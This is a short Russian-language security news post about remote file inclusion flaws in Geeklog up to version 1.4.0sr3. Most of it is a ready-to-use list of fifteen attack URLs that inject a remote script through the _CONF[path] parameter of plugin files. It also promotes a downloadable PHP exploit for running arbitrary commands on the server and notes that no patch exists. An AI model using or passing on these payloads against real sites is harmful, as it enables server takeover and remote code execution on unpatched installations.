Уязвимости и эксплойт для Geeklog

Сегодня были опубликованы массовые уязвимости в Geeklog <= 1.4.0sr3, а также эксплойт, написанный на их основе. Уязвимости критические, патчей на данный момент нет. Работает при register_globals=on.

http://www.site.com/[path]/plugins/links/functions.inc?_CONF[path]=[Evil_Script]
http://www.site.com/[path]/plugins/polls/functions.inc?_CONF[path]=[Evil_Script]
http://www.site.com/[path]/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=[Evil_Script]
http://www.site.com/[path]/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=[Evil_Script]
http://www.site.com/[path]/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=[Evil_Script]
http://www.site.com/[path]/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=[Evil_Script]
http://www.site.com/[path]/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=[Evil_Script]
http://www.site.com/[path]/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=[Evil_Script]
http://www.site.com/[path]/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=[Evil_Script]
http://www.site.com/[path]/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=[Evil_Script]
http://www.site.com/[path]/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=[Evil_Script]
http://www.site.com/[path]/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=[Evil_Script]
http://www.site.com/[path]/plugins/spamx/Import.Admin.class.php?_CONF[path]=[Evil_Script]
http://www.site.com/[path]/plugins/spamx/LogView.Admin.class.php?_CONF[path]=[Evil_Script]
http://www.site.com/[path]/plugins/staticpages/functions.inc?_CONF[path]=[Evil_Script]

Кроме этого, появился и эксплойт, написан на php. Позволяет при успешном исполнении выполнять любые команды на сервере. Успешно работает при только short_open_tag=on.

Скачать эксплойт уязвимости Geeklog <= 1.4.0sr3